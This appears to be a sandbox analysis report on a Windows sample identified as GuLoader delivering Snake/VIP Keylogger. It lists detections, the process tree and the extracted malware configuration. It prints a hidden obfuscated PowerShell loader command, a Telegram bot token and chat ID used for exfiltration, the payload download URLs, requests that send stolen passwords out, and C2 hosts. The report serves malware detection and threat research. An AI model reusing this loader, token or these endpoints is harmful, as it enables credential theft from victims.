Edit tour

Windows Analysis Report
66776676676.exe

Overview

General Information

Sample name:	66776676676.exe
Analysis ID:	1578053
MD5:	a30468384472782c5b2fc6a439f641bb
SHA1:	2695582dda03035b463e939b1a2577505e9a2766
SHA256:	cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f
Tags:	exeuser-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

66776676676.exe (PID: 736 cmdline: "C:\Users\user\Desktop\66776676676.exe" MD5: A30468384472782C5B2FC6A439F641BB)

powershell.exe (PID: 1448 cmdline: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 2720 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg", "Chat_id": "5434550993", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 2720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 2720	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.208.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2720, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49797

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", CommandLine: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\66776676676.exe", ParentImage: C:\Users\user\Desktop\66776676676.exe, ParentProcessId: 736, ParentProcessName: 66776676676.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", ProcessId: 1448, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:19:40.133637+0100	2803305	3	Unknown Traffic	192.168.2.4	49831	172.67.177.134	443	TCP
2024-12-19T08:19:43.022710+0100	2803305	3	Unknown Traffic	192.168.2.4	49843	172.67.177.134	443	TCP
2024-12-19T08:19:45.902409+0100	2803305	3	Unknown Traffic	192.168.2.4	49850	172.67.177.134	443	TCP
2024-12-19T08:19:54.666017+0100	2803305	3	Unknown Traffic	192.168.2.4	49876	172.67.177.134	443	TCP
2024-12-19T08:19:57.551048+0100	2803305	3	Unknown Traffic	192.168.2.4	49883	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:19:35.844427+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49820	193.122.130.0	80	TCP
2024-12-19T08:19:38.266331+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49820	193.122.130.0	80	TCP
2024-12-19T08:19:41.407147+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49837	193.122.130.0	80	TCP
2024-12-19T08:19:44.297581+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49845	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T08:19:27.822396+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49797	216.58.208.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg", "Chat_id": "5434550993", "Version": "4.4"}
Source: msiexec.exe.2720.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 66776676676.exe	ReversingLabs: Detection: 39%
Source: 66776676676.exe	Virustotal: Detection: 36%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 80.6% probability

Machine Learning detection for sample

Source: 66776676676.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 66776676676.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49825 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49897 version: TLS 1.2

Source: 66776676676.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0272F45Dh	6_2_0272F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0272F45Dh	6_2_0272F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0272FC19h	6_2_0272F970

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302Host: api.telegram.orgContent-Length: 581

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49820 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49837 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49845 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49843 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 216.58.208.238:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49876 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49883 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 172.67.177.134:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49825 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302Host: api.telegram.orgContent-Length: 581

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 19 Dec 2024 07:20:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 66776676676.exe, 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434
Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025170000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025161000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
